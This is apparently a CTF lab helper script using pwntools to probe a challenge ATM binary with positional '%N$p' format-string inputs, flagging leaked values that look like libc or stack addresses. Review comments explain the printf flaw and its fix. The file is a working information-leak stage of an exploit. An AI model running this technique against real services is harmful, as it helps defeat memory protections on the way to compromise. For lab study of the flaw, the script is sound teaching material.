OffSec-CTF/lab3_4_recap/02_aquabank_atm/find_libc.py

from pwn import *
# Lab helper: enumerate positional format-string arguments against the local
# challenge binary and report the positions whose echoed value looks like a
# high userspace address.
#
# NOTE(review): the script relies on the note text being interpreted as a
# format string when it is printed back. Presumably the binary passes the note
# as the format argument of a printf-family call; the service-side fix would
# then be to pass it as data (e.g. printf("%s", note)) - confirm against the
# binary's source.
context.binary = elf = ELF("./aquabank-atm_patched", checksec=False)
p = process(elf.path)
# p = remote("offsec.m0lecon.it", 13523)

MENU_PROMPT = b"> "

# Print everything up to the first menu prompt.
print(p.recvuntil(MENU_PROMPT))

for slot in range(1, 400):
    # Menu entry 1: submit a note that consists of one positional %p specifier.
    p.sendline(b"1")
    p.recvuntil(b"Type your customer note: ")
    p.sendline(f"%{slot}$p".encode())
    p.recvuntil(MENU_PROMPT)

    # Menu entry 2: have the note printed back and read the line after the header.
    p.sendline(b"2")
    p.recvuntil(b"--- Your customer note ---\n")
    echoed = p.recvline()

    # Substring heuristic only: it matches any echoed line containing "0x7f".
    # NOTE(review): on typical x86-64 Linux both shared-library mappings and
    # the stack fall in that range, so a hit is a candidate rather than a
    # confirmed libc pointer - verify against the process memory map.
    if b"0x7f" in echoed:
        print(f"Address:{echoed} at pos:{slot}")

    # Resynchronise on the menu prompt before the next iteration.
    p.recvuntil(MENU_PROMPT)